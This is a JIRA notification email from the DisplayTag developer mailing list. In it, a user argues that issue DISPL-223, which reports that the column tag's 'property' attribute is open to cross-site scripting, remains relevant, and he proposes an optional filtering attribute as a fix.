[
https://jira.codehaus.org/browse/DISPL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=287833#comment-287833
]
aaron pieper commented on DISPL-223:
------------------------------------
I realize this is an old issue - but it seems like it's still pertinent? I
agree with the submitter that this tag is vulnerable to cross-site scripting,
and I don't understand your dismissal of the issue. You're right, the
"property" attribute specifies a value which is fetched from a server-side
object, but that doesn't contradict the idea that this would be relevant to
cross-site scripting.
For example, one might create a web application which allows for users to
submit new products, with a product description (500 character field which
needs to support special characters). These products, after being retrieved
from the database, might be displayed in a table uses display:column tags.
Rendering these values with the column tag would render the description tag
vulnerable to a cross-site scripting attack.
Assuming the software developer wants to continue using the displayTag library,
the best workaround is the one Ralf Hauser suggested, but an optional filtering
attribute would be much easier to use.
> column property attribute susceptible to cross-site scripting!!
> ---------------------------------------------------------------
>
> Key: DISPL-223
> URL: https://jira.codehaus.org/browse/DISPL-223
> Project: DisplayTag
> Issue Type: Bug
> Components: HTML Generation
> Affects Versions: 1.0
> Priority: Critical
> Original Estimate: 2 hours
> Remaining Estimate: 2 hours
>
> Column tag "property"
> (http://displaytag.sourceforge.net/tagreference-displaytag-12.html#column) is
> susceptible to cross-site scripting.
> It should offer a 'filter="true"' as existing in
> http://struts.apache.org/userGuide/struts-bean.html#write
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators:
https://jira.codehaus.org/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
------------------------------------------------------------------------------
Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
infrastructure or vast IT resources to deliver seamless, secure access to
virtual desktops. With this all-in-one solution, easily deploy virtual
desktops for less than the cost of PCs and save 60% on VDI infrastructure
costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
_______________________________________________
displaytag-devel mailing list
displaytag-devel@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/displaytag-devel
